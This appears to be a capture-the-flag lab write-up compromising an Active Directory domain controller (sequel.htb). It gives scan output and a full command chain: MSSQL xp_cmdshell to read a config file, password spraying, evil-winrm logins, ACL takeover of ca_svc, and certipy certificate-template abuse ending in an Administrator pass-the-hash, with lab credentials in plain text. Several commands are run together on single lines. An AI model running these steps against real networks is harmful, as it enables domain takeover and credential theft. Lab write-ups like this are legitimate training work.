Recon:
└─$ nmap -sC -sV -A 10.10.11.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-07 11:12 IST
Nmap scan report for 10.10.11.51
Host is up (0.42s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-07 05:43:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-05-07T05:44:47+00:00; -2s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-05-07T05:44:47+00:00; -2s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-05-07T05:44:47+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-07T04:02:17
|_Not valid after: 2055-05-07T04:02:17
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-05-07T05:44:47+00:00; -2s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-07T05:44:47+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | smb2-time: | date: 2025-05-07T05:44:10 |_ start_date: N/A |clock-skew: mean: -2s, deviation: 0s, median: -2s | smb2-security-mode: | 3:1:1: | Message signing enabled and required
TRACEROUTE (using port 53/tcp) HOP RTT ADDRESS 1 348.85 ms 10.10.16.1 2 521.57 ms 10.10.11.51
Enumeration
impacket-GetADUsers sequel.htb/rose:KxEPkKe6R8su -dc-ip 10.10.11.51 -all
python -m venv impenv
source impenv/bin/activate
pip install impacketsmbmap -H 10.10.11.51 -u rose -p 'KxEPkKe6R8su'
We also have accounting Department
so there is one mysql password
impacket-mssqlclient -port 1433 sequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51
xp_cmdshell "type C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI"
Found pass for sql_svc
Tried EvilWinrm
Failed for user sql_svc
crackmapexec smb 10.10.11.51 -u found_users -p found_pass --continue-on-success
so same password can be used with ryan
evil-winrm -u 'ryan' -p 'WqSZAF6CysDQbGb3' -i sequel.htb
user flag found
`Bloohound with user ryan
neo4j console #tostart neo4j
sudo bloodhound-python -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 -ns 10.10.11.51 -c all
bloodhound #forGUI
ryan has writeOwner over ca_svc
ROOT:
python3 bloodyAD.py --host '10.10.11.51' -d 'sequel.htb' -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner 'ca_svc' 'ryan'impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"Above command grant us fullcontrol over ca_svc
Certipy, a tool designed to interact with Active Directory certificate services. The specific command you're running is attempting to perform a Shadow Credentials attack against the ca_svc account in Active Directory.
certipy-ad find -vulnerable -u ryan@sequel.htb -p WqSZAF6CysDQbGb3 -dc-ip 10.10.11.51
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -dc-ip 10.10.11.51 -target dc01.sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'sudo ntpdate -s 10.10.11.51;certipy-ad req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target dc01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 
evil-winrm -i 10.10.11.51 -u "administrator" -H "7a*******************************"
Info
- Even non-admin users can escalate privileges via misconfigured certificate template
- Disable Unused Templates
- Regular audit + permission cleanup is essential to prevent this.